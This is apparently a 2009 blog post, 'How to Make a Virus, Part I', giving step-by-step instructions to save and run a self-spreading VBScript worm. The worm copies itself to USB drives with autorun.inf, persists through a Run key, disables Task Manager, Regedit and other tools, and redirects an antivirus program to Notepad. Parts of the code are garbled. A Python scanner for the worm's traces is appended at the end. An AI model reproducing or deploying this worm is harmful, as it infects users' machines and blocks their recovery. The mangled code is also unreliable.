Friday, 13 February 2009

How to Make a Virus, Part I

How to Make a Virus

Any mistakes are at your own risk

1. Open Notepad

2. Copy or type the script below

‘Coplax_X

‘Variant of coplax.VBS
on error resume next

‘Declare the following names
dim rekur,windowpath,desades,fs,mf,isi,tf,coplax,nt,check,sd

’prepare the autorun contents
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe coplaxms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘create the parent file
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “coplaxx.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “coplax_x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “coplax_x.dll.vbs”)
tf.attributes = 39

’spread to removable discs, together with an Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”coplaxms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”coplaxms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”coplaxms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”autorun.inf”)
tf.attributes=39
end if
next

‘Registry manipulation
set kalong = createobject(”WScript.Shell”)

‘Change the IE title
kalong.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,”:: ->COPLAX_X<- ::” ‘Hidden files not shown coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”,2, “REG_DWORD” ‘Block Find, FolderOptions, Run, Regedit, Task Manager, and right-click coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1″, “REG_DWORD” ‘Create a message at Windows startup coplax.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “THE COPLAX_X”

coplax.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText”,”No reason for Panic”

‘Change the registered user name and company name

echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "COPLAX", "REG_SZ">>c:\windows\aaaa.vbs
echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "COPLAX Corp.", "REG_SZ">>c:\windows\aaaa.vbs

‘Activate at Windows startup

coplax.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- coplax.dll.vbs”


‘Redirect the following applications. If one is opened, Notepad opens instead
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exeDebugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname

After you have placed the code, click FILE > SAVE. Under File Type choose ALL FILES (*.*), then save it with the name coplax32.dll.vbs.
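The script above leaves three kinds of trace a responder can check for: an `autorun.inf` whose launch line starts a script host, policy values that switch off Task Manager, Regedit, Run and Folder Options, and `Debugger` values under Image File Execution Options. The following is an added example, not part of the original post, that flags all three in text input. It assumes the registry data is regedit-style export text; the function names and sample inputs are constructed for illustration.

```python
import re

# Launch lines that hand control to a script host or script file are worth flagging.
SCRIPT_HINT = re.compile(r"\b(wscript|cscript)\b|\.(vbs|vbe|js|jse|wsf)\b", re.I)
# Policy values that hide or disable the tools a user would use to investigate.
LOCKOUT = {"nofind", "nofolderoptions", "norun", "noviewcontextmenu",
           "disableregistrytools", "disabletaskmgr"}
IFEO = "\\windows nt\\currentversion\\image file execution options\\"

def scan_autorun(text):
    """Return (key, value) launch entries in [autorun] that start a script."""
    hits, active = [], False
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("["):
            active = line.lower() == "[autorun]"
        elif active and "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            if key.lower() in ("open", "shellexecute") and SCRIPT_HINT.search(value):
                hits.append((key.lower(), value))
    return hits

def scan_reg_export(text):
    """Return (kind, key, value_name) findings from regedit-style export text."""
    found, key = [], ""
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m:
            continue
        name, data, low = m.group(1).lower(), m.group(2), key.lower()
        if IFEO in low and name == "debugger":
            found.append(("ifeo_debugger", key, m.group(1)))
        elif "\\policies\\" in low and name in LOCKOUT and data != "dword:00000000":
            found.append(("tool_lockout", key, m.group(1)))
    return found

# Constructed sample inputs (not captured from a real system).
SAMPLE_AUTORUN = "[autorun]\nshellexecute=wscript.exe example.vbs\nicon=drive.ico\n"
SAMPLE_REG = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="notepad.exe"
"""
if __name__ == "__main__":
    print(scan_autorun(SAMPLE_AUTORUN), scan_reg_export(SAMPLE_REG))
```

A `Debugger` value under Image File Execution Options can also be set legitimately by developers, so treat that finding as a prompt to review the target rather than as proof of infection.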
